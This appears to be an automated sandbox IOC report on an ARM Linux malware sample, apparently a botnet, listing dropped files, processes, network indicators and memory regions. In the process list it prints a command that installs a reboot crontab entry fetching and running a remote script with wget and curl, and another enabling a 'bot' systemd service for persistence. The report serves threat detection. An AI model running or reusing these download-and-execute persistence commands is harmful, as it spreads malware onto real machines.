IOC Report
armv4l.elf

loading gif

Files

File Path
Type
Category
Malicious
armv4l.elf
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
initial sample
malicious
/root/.bashrc
ASCII text
dropped
malicious
/var/spool/cron/crontabs/tmp.csTjpj
ASCII text
dropped
malicious
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/usr/lib/systemd/system/bot.service
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/armv4l.elf
/tmp/armv4l.elf
/tmp/armv4l.elf
-
/tmp/armv4l.elf
-
/tmp/armv4l.elf
-
/tmp/armv4l.elf
-
/tmp/armv4l.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/chmod
chmod +x bins.sh
/bin/sh
-
/usr/bin/sh
sh bins.sh
/bin/sh
-
/bin/curl
/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
/bin/sh
-
/usr/bin/chmod
chmod +x bins.sh
/usr/bin/sh
sh bins.sh
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/armv4l.elf
-
/bin/sh
sh -c "/bin/systemctl enable bot"
/bin/sh
-
/bin/systemctl
/bin/systemctl enable bot
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 17 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://serverip/bins/bins.sh
unknown
http://serverip/bins/bins.sh;
unknown

Domains

Name
IP
Malicious
daisy.ubuntu.com
162.213.35.24
host.zopz-api.com
172.111.38.48

IPs

IP
Domain
Country
Malicious
172.111.38.48
host.zopz-api.com
Reserved

Memdumps

Base Address
Regiontype
Protect
Malicious
7ff284032000
page read and write
7ff38c6be000
page read and write
565387840000
page read and write
565389855000
page read and write
7ff38b1dc000
page read and write
7ff384021000
page read and write
7ff38ba76000
page read and write
7ff284039000
page read and write
7ff383fff000
page read and write
7ff38bdd8000
page read and write
7ff284029000
page execute read
7ff38b9e4000
page read and write
7ff38c595000
page read and write
7ff38c1d2000
page read and write
56538983e000
page execute and read and write
7ff38c6be000
page read and write
5653875e6000
page execute read
5653899df000
page read and write
5653899ff000
page read and write
7ff38b9e4000
page read and write
7ff38bdd8000
page read and write
7ff38c1d2000
page read and write
5653875e6000
page execute read
565387837000
page read and write
7ff38c6e2000
page read and write
7ff38c043000
page read and write
7ff383fff000
page read and write
7fff0a9d4000
page execute read
7ff38ba76000
page read and write
7ff284039000
page read and write
7ff384021000
page read and write
7ff38c3b4000
page read and write
7ff284032000
page read and write
565387837000
page read and write
7ff38c066000
page read and write
7ff38c3b4000
page read and write
7ff38c043000
page read and write
7fff0a8da000
page read and write
7ff38c595000
page read and write
5653899df000
page read and write
7fff0a8da000
page read and write
7ff284029000
page execute read
7ff38c6e2000
page read and write
7ff38c727000
page read and write
7ff38c727000
page read and write
7ff38c066000
page read and write
7fff0a9d4000
page execute read
56538983e000
page execute and read and write
565389855000
page read and write
7ff38b1dc000
page read and write
565387840000
page read and write
7ff28403b000
page read and write
There are 42 hidden memdumps, click here to show them.